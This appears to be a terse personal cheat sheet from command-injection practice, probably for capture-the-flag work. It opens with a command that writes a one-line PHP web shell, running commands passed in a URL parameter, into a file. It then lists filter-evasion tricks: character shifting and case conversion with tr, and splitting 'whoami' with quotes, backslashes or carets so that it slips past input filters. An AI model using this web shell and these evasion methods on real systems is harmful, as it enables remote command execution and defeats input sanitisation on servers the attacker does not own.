sudo sh -c "echo '<?php system($_GET['cmd']); ?>' >> 666.php"


characters shifts:      映射
  man ascii
  echo $(tr '!-}' '"-~'<<<[)
    $():    get value
    tr:     set2 cp to set1
    '!-}':  set1, asscii from ! to -
    '"-~':  set2, asscii from " to ~
    <<<[:   pass [ to tr '!-}' '"-~'  ,  so pass [ get \

  $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")


adding pairs of "" or '' between letters: The important things to remember are that we cannot mix types of quotes and the number of quotes must be even. e.g. "wh"o"am""i"
OR adding \ @ $ between letters (Linux)
OR ^ (Windows)
